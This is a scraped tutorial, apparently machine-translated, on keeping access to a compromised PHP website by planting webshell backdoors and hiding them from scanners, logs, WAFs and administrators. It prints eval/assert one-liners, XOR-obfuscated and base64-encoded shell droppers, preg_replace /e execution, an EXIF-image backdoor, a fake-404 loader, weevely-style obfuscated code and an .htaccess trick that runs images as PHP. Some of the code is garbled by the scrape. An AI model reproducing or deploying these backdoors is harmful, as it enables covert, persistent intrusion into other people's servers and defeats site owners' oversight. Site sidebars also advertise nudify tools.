search
HomeBackend DevelopmentPHP TutorialPHP backdoor hiding and maintenance techniques

After a successful test, you usually want to keep the privileges longer. The work of leaving backdoors is crucial. The backdoors usually deployed include but are not limited to database permissions, WEB permissions, system user permissions, etc. This article will popularize some of the ideas hidden in Volkswagen’s backdoors.

AD:

0×00 Preface

After a successful test, you usually want to keep the privileges longer. The work of leaving backdoors is very important. The backdoors usually deployed include but are not limited to databases. Permissions, WEB permissions, system user permissions, etc. This article will popularize some of the ideas hidden by popular backdoors.

Take PHP-WEBBACKDOOR as an example to attract others

A most common one-sentence backdoor may be written like this

  1. eval($_POST['cmd']);?>

or this

  1. $_POST['cmd' ]);?>

Of course, this is only different in the functions called. Regarding the functions disabled by PHP, please look for them in php.ini: disable_functions.

But there are many ways for operation and maintenance to intuitively find our shell. For example,

◆ found anomalies through file name/modification time/size, file backup comparison

◆ found through WEBSHELL backdoor scanning script, such as Scanbackdoor.php/Pecker/shelldetect.php and various scanners, etc.

◆Through Access.log access log found the location of the backdoor

◆Or, our test sentence will be blocked by WAF, and there will be a warning log, etc.

In view of common detection methods, the following seven common techniques are summarized to hide the shell

0×01 circumvention

Look at the various scanning backdoor codes and you will know that leaving a keyword that everyone knows and everyone shouts is absolutely not allowed in the shell

Common keywords such as :

◆System command execution: system, passthru, shell_exec, exec, popen, proc_open

◆Code execution: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13

◆File contains: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

In the past, a friend cleverly used $_POST[0]($_POST[1]) to execute commands. Unfortunately, it is difficult to escape the scanner now, but everything has changed, and the construction method It is infinite

tudouya classmate gave [a construction technique] on FREEBUF (http://www.freebuf.com/articles/web/33824.html) using

  1. @$ _++; // $_ = 1
  2. $__=("#"^"|"); // $__ = _
  3. $__.=( "."^"~"); // _P
  4. $__.=("/"^"`"); // _PO
  5. $ __.=("|"^"/"); // _POS
  6. $__.=("{"^"/"); // _POST
  7. ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
  8. ?>

Construction generation, of course, if it is too intuitive, you can write it like this

  1. $_++;$__=("#"^"|").( "."^"~").("/"^"`").("|"^"/").("{"^"/");@${ $__}[!$_](${$__}[$_]);?> The code is disguised, and a simple "anti-kill" shell sample appearsIt executes correctly and bypasses ordinary scanners, and you can also rely on it to write a new temporary shell0×02 feature It is also an interesting way to execute commands with the help of syntax features. Borrowing the syntax features of PHP when processing variables, it will analyze whether the data in double quotes contains variables (and parse their values)eg.:
  2. ${@
eval(phpinfo())}

{} can parse the variable content within double quotes, @keep the error and continue execution

Then you can start to construct the hidden backdoor, but here the structure wants to rely on The command execution caused by the function is, yes, preg_replace

"//e",

$_POST[

'cmd'],

"");?>

  1. This method has obviously been entered into the scanner blacklist, please modify it simply
    1. function funfunc($str){}
    2. echo preg_replace("/(.+?)/ies", 'funfunc ("1")', $_POST["cmd"]);
    3. ?>

    was executed and was not found. The way of execution is obvious. After regular matching The {${phpinfo()}} caused code execution when passed into funfunc

    funfunc(

    "{${phpinfo()}}")

    1. Another method
    2. "$arr="".

      $_GET[

      'cmd'].
        "";");?>
      1. 0×03 contains

      file contains everyone I have tried all the methods, but there are also techniques for including. Ordinary file inclusion may just be an include that contains a certain txt or jpg, or even directly leave an include vulnerability, but it is easy for a scanner to find it, and extra include files are also easy to find.

      Look at this script

      if(@isset(

      $_GET[content]))

      1. {
      2. $fp=fopen('REA DME',
      3. 'w ');
      4. file_put_contents('README',"
      5. @file_put_contents('README',$_GET [content],FILE_APPEND); (Fclose (l $ fp);
      6. Require
      7. 'README ';} ? & Gt;
      8. can be regarded as solved a little problem.
      9. Unfortunately, because functions such as file_put_contents are too sensitive, they are easily discovered by scanning Encoding is used to create a shell, which is generated with access.
      10. fputs(fopen(
      base64_decode (

      'cGx1Z2luX20ucGhw'),w),

      base64_decode(

      'PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));

      1. ?> Can evade some scanners, but this mode is also more attractive To attract people's attention, the new files generated should also be simply hidden to avoid detection. Of course, new concepts such as heuristics will not be considered. In the case that this method cannot meet the needs, a smart The attacker regained the image $exif=exif_read_data('./lol.jpg');preg_replace(
      2. $exif[
      3. 'Make'],
      4. $exif[
      'Model'] ,

      '');?>

      1. Reference: A backdoor hidden in the EXIF ​​of JPG imagesThis time, you don’t have to simply copy /b to generate the image horse, use preg_replace to execute Specific flags of the file are also possibleHere may prompt Call to undefined function exif_read_data()You need to modify php.ini, extension=php_exif.dllChange its loading order to extension=php_mbstring.dll From the back

      it can be seen that this image backdoor relies on the preg_replace e parameter, relies on PHP's variable parsing and execution, and uses base64 encoding. Finally, it relies on file identification to put together a complete shell, which can be regarded as hiding the backdoor for beginners. A little reminder for children's shoes

      Of course, as long as there is an include point, the form of the included file is diverse, even including error_log (although you may want to consider closing it), only unexpected...

      0×04 is hidden

      In order to prevent visitors After discovering the existence of backdoors, clever security researchers will also confuse things and try to confuse things

      1. span>"-//IETF//DTD HTML 2.0//EN">
      2.                                                                             >
      3.   body>
      4.                                                                                           
      5. ?>
      6. With the help of the above html rendering, the browsing page has begun to disguise 404 to confuse the audience
      7. But it can’t be avoided by visitors or log analysis. In order to better hide in a large number of logs, the structure The following script
      8. header('HTTP/1.1 404'); ob_start(); @fputs(fopen(
      9. base64_decode(
      10. 'cGx1Z2luX20ucGhw'),w),
      11. base64_decode(
      'PD9waHAgQGFzc2VydCgkX1BPU1RbJ2NtZCddKTs/Pg=='));

      1. The access is a real 404, yes, the same is true in the log
      2. But at this moment, the script we want to connect has been generated in the current directory 0×05 confusion Children’s shoes who have used the weevely tool should know that the anti-kill shell it generates is like this $penh=
      3. "sIGpvaW4oYXJyYgiXlfc2xpY2UoJGEsgiJGMoJGEpLTgiMpKSkpgiKTtlY2hvICc8LycgiuJgiGsugiJz4nO30=";
      $kthe=

      "JGEpPjgiMpe yRrPSgidwcyc7ZWNobyAnPCcgiugiJGsuJz4nOgi2V2YWwoYgimFzZTY0X2giRlY2gi9kgiZShwcmVn";

                                                                    stwrw_wrwepwlwawcwe");

                                                                            
      1. $zrmt=
      2. "JGM9J2NvdWgi50JzskgiYT0gikX0NgiPT0tJRgiTtpZihyZXNldCgkYSk9PSgidvbycggiJgiiYgJGMo";
      3. $smgv =
      4. $ftdf(
      5. "f", "", " bfafsfef6f4_fdfefcodfe”);
      6. $rdwm = $jgfi( '', $smgv($ftdf("gi", "", $zrmt.$kthe.$wmmi.
      7. $penh)));
      8. $rdwm();
      9. ?> After connecting to the terminal, it looks like thisPs: I forgot to change the terminal code in the screenshot: (
      10. The way to avoid killing is to generate a random name in a fixed area variables, and then use str_replace to combine base64_decode, the process of executing the commandOf course, this is to obfuscate at the code level to avoid scannersThe more commonly used method of obfuscation:◆Modify the file time◆Rename and integrate into upload The folder where the file is located makes it impossible to visually detect file abnormalities◆Disguise processing of file size (at least the size looks like a normal script)
      11. ◆Choose the hiding path and access as little as possible◆Abnormal directory %20 About the space directory, it is relatively easy to find0×06 parsingUse .htaccess to add parsing backdoorsuch as:AddType application/x-httpd-php .jpg
      12. The above is taking weeverly as an example
      13. 0×07 Mixture

      To summarize the above methods, most of them are nothing more than a process of constructing vulnerabilities. The code constructed by the vulnerability can be as weird as the backdoor can be. You can write something delicate and graceful, or you can make it simple and crude, but the applicable situations are different. For example It is not difficult to integrate ideas well and construct your own hidden shell. The above is just a summary of experience. If you have interesting ideas, please feel free to enlighten me.

      The above introduces the PHP backdoor hiding and maintenance techniques, including the relevant content. I hope it will be helpful to friends who are interested in PHP tutorials.

Statement
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
PHP: An Introduction to the Server-Side Scripting LanguagePHP: An Introduction to the Server-Side Scripting LanguageApr 16, 2025 am 12:18 AM

PHP is a server-side scripting language used for dynamic web development and server-side applications. 1.PHP is an interpreted language that does not require compilation and is suitable for rapid development. 2. PHP code is embedded in HTML, making it easy to develop web pages. 3. PHP processes server-side logic, generates HTML output, and supports user interaction and data processing. 4. PHP can interact with the database, process form submission, and execute server-side tasks.

PHP and the Web: Exploring its Long-Term ImpactPHP and the Web: Exploring its Long-Term ImpactApr 16, 2025 am 12:17 AM

PHP has shaped the network over the past few decades and will continue to play an important role in web development. 1) PHP originated in 1994 and has become the first choice for developers due to its ease of use and seamless integration with MySQL. 2) Its core functions include generating dynamic content and integrating with the database, allowing the website to be updated in real time and displayed in personalized manner. 3) The wide application and ecosystem of PHP have driven its long-term impact, but it also faces version updates and security challenges. 4) Performance improvements in recent years, such as the release of PHP7, enable it to compete with modern languages. 5) In the future, PHP needs to deal with new challenges such as containerization and microservices, but its flexibility and active community make it adaptable.

Why Use PHP? Advantages and Benefits ExplainedWhy Use PHP? Advantages and Benefits ExplainedApr 16, 2025 am 12:16 AM

The core benefits of PHP include ease of learning, strong web development support, rich libraries and frameworks, high performance and scalability, cross-platform compatibility, and cost-effectiveness. 1) Easy to learn and use, suitable for beginners; 2) Good integration with web servers and supports multiple databases; 3) Have powerful frameworks such as Laravel; 4) High performance can be achieved through optimization; 5) Support multiple operating systems; 6) Open source to reduce development costs.

Debunking the Myths: Is PHP Really a Dead Language?Debunking the Myths: Is PHP Really a Dead Language?Apr 16, 2025 am 12:15 AM

PHP is not dead. 1) The PHP community actively solves performance and security issues, and PHP7.x improves performance. 2) PHP is suitable for modern web development and is widely used in large websites. 3) PHP is easy to learn and the server performs well, but the type system is not as strict as static languages. 4) PHP is still important in the fields of content management and e-commerce, and the ecosystem continues to evolve. 5) Optimize performance through OPcache and APC, and use OOP and design patterns to improve code quality.

The PHP vs. Python Debate: Which is Better?The PHP vs. Python Debate: Which is Better?Apr 16, 2025 am 12:03 AM

PHP and Python have their own advantages and disadvantages, and the choice depends on the project requirements. 1) PHP is suitable for web development, easy to learn, rich community resources, but the syntax is not modern enough, and performance and security need to be paid attention to. 2) Python is suitable for data science and machine learning, with concise syntax and easy to learn, but there are bottlenecks in execution speed and memory management.

PHP's Purpose: Building Dynamic WebsitesPHP's Purpose: Building Dynamic WebsitesApr 15, 2025 am 12:18 AM

PHP is used to build dynamic websites, and its core functions include: 1. Generate dynamic content and generate web pages in real time by connecting with the database; 2. Process user interaction and form submissions, verify inputs and respond to operations; 3. Manage sessions and user authentication to provide a personalized experience; 4. Optimize performance and follow best practices to improve website efficiency and security.

PHP: Handling Databases and Server-Side LogicPHP: Handling Databases and Server-Side LogicApr 15, 2025 am 12:15 AM

PHP uses MySQLi and PDO extensions to interact in database operations and server-side logic processing, and processes server-side logic through functions such as session management. 1) Use MySQLi or PDO to connect to the database and execute SQL queries. 2) Handle HTTP requests and user status through session management and other functions. 3) Use transactions to ensure the atomicity of database operations. 4) Prevent SQL injection, use exception handling and closing connections for debugging. 5) Optimize performance through indexing and cache, write highly readable code and perform error handling.

How do you prevent SQL Injection in PHP? (Prepared statements, PDO)How do you prevent SQL Injection in PHP? (Prepared statements, PDO)Apr 15, 2025 am 12:15 AM

Using preprocessing statements and PDO in PHP can effectively prevent SQL injection attacks. 1) Use PDO to connect to the database and set the error mode. 2) Create preprocessing statements through the prepare method and pass data using placeholders and execute methods. 3) Process query results and ensure the security and performance of the code.

See all articles

Hot AI Tools

Undresser.AI Undress

Undresser.AI Undress

AI-powered app for creating realistic nude photos

AI Clothes Remover

AI Clothes Remover

Online AI tool for removing clothes from photos.

Undress AI Tool

Undress AI Tool

Undress images for free

Clothoff.io

Clothoff.io

AI clothes remover

AI Hentai Generator

AI Hentai Generator

Generate AI Hentai for free.

Hot Article

R.E.P.O. Energy Crystals Explained and What They Do (Yellow Crystal)
4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Best Graphic Settings
4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. How to Fix Audio if You Can't Hear Anyone
4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌
R.E.P.O. Chat Commands and How to Use Them
4 weeks agoBy尊渡假赌尊渡假赌尊渡假赌

Hot Tools

mPDF

mPDF

mPDF is a PHP library that can generate PDF files from UTF-8 encoded HTML. The original author, Ian Back, wrote mPDF to output PDF files "on the fly" from his website and handle different languages. It is slower than original scripts like HTML2FPDF and produces larger files when using Unicode fonts, but supports CSS styles etc. and has a lot of enhancements. Supports almost all languages, including RTL (Arabic and Hebrew) and CJK (Chinese, Japanese and Korean). Supports nested block-level elements (such as P, DIV),

SAP NetWeaver Server Adapter for Eclipse

SAP NetWeaver Server Adapter for Eclipse

Integrate Eclipse with SAP NetWeaver application server.

WebStorm Mac version

WebStorm Mac version

Useful JavaScript development tools

MinGW - Minimalist GNU for Windows

MinGW - Minimalist GNU for Windows

This project is in the process of being migrated to osdn.net/projects/mingw, you can continue to follow us there. MinGW: A native Windows port of the GNU Compiler Collection (GCC), freely distributable import libraries and header files for building native Windows applications; includes extensions to the MSVC runtime to support C99 functionality. All MinGW software can run on 64-bit Windows platforms.

VSCode Windows 64-bit Download

VSCode Windows 64-bit Download

A free and powerful IDE editor launched by Microsoft